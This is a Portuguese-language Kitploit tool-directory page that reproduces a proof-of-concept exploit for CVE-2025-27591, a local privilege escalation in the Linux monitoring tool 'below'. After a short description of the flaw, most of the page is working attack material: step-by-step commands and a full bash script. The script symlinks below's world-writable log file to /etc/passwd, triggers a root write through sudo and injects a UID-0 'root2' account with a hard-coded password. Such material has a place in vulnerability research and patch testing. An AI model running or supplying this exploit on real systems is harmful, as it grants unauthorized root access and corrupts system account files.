Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-27591-below- — Escalação de privilégios local via `below` (CVE-2025-27591) - PoC Exploit | Kitploit
Ferramentas/GitHubGitHub/visaicyber/cve-2025-27591-below-
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoConfiguração Incorreta
GitHubvisaicyber/cve-2025-27591-below-

CVE-2025-27591-below-

Escalação de privilégios local via `below` (CVE-2025-27591) - PoC Exploit

Ver Repositório
2há 11 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-27591 – Escalação de Privilégios no Below

1) Introdução

Below é uma ferramenta Linux para registrar e exibir dados do sistema, como utilização de hardware e métricas de cgroups.

Em versões anteriores à v0.9.0, o serviço systemd do Below é executado com privilégios de root e cria diretórios e arquivos de log com permissão de escrita global em /var/log/below. Essa configuração insegura permite ataques de symlink que possibilitam a um usuário local sem privilégios escalar privilégios para root.

Este problema recebeu o identificador CVE-2025-27591.
O upstream corrigiu na versão v0.9.0.


2) Vulnerabilidade – Ataque de Symlink em /var/log/below

  • O Below garante que /var/log/below tenha permissões 0777 em tempo de execução.
  • Ele também cria /var/log/below/error_root.log com permissões 0666.
  • Como o diretório tem permissão de escrita global, um atacante pode substituir o arquivo de log por um symlink para qualquer arquivo sensível (ex.: /etc/passwd).
  • Quando o Below grava logs como root, ele grava no destino do symlink, permitindo a escalada de privilégios.

Esse comportamento contorna o endurecimento protected_symlinks do kernel porque o sticky bit não é aplicado.


3) Exploração

Ao apontar error_root.log para /etc/passwd, podemos injetar um novo usuário root com uma senha conhecida.

Passos

Passo 1: Crie um backup de /etc/passwd. Sempre faça backup antes de modificar arquivos do sistema:

root@kitploit:~
cp /etc/passwd /tmp/passwd.bak

Passo 2: Gere uma entrada de usuário maliciosa

root@kitploit:~
HASH=$(openssl passwd -6 'rooted123')
echo "root2:$HASH:0:0:root:/root:/bin/bash" > /tmp/payload

Passo 3: Crie um symlink para o log vulnerável

root@kitploit:~
rm -f /var/log/below/error_root.log
ln -s /etc/passwd /var/log/below/error_root.log

Passo 4: Acione a criação do log

root@kitploit:~
sudo /usr/bin/below replay --time "invalid" >/dev/null 2>&1

Passo 5: Sobrescreva /etc/passwd

root@kitploit:~
cat /tmp/payload > /var/log/below/error_root.log

Passo 6: Alterne para o novo usuário root

root@kitploit:~
su root2
# password: rooted123

4) Prova de Conceito (PoC): Execute este script

root@kitploit:~
#!/bin/bash
# CVE-2025-27591 Exploit - Privilege Escalation via 'below'

TARGET="/etc/passwd"
LINK_PATH="/var/log/below/error_root.log"
TMP_PAYLOAD="/tmp/payload"
BACKUP="/tmp/passwd.bak"

echo "[*] CVE-2025-27591 Privilege Escalation Exploit"

# Check for sudo access to below
echo "[*] Checking sudo permissions..."
if ! sudo -l | grep -q '/usr/bin/below'; then
  echo "[!] 'below' is not available via sudo. Exiting."
  exit 1
fi

# Backup current /etc/passwd
echo "[*] Backing up /etc/passwd to $BACKUP"
cp /etc/passwd "$BACKUP"

# Generate password hash for 'root2' user (password: rooted123)
echo "[*] Generating password hash..."
HASH=$(openssl passwd -6 'rooted123')

# Prepare malicious passwd line
echo "[*] Creating malicious passwd line..."
echo "root2:$HASH:0:0:root:/root:/bin/bash" > "$TMP_PAYLOAD"

# Create symlink
echo "[*] Linking $LINK_PATH to $TARGET"
rm -f "$LINK_PATH"
ln -sf "$TARGET" "$LINK_PATH"

# Trigger log creation with invalid --time to force below to recreate the log
echo "[*] Triggering 'below' to write to symlinked log..."
sudo /usr/bin/below replay --time "invalid" >/dev/null 2>&1

# Overwrite passwd file via symlink
echo "[*] Injecting malicious user into /etc/passwd"
cat "$TMP_PAYLOAD" > "$LINK_PATH"

# Test access
echo "[*] Try switching to 'root2' using password: rooted123"
su root2
CVE-2025-27591
Baixar ferramenta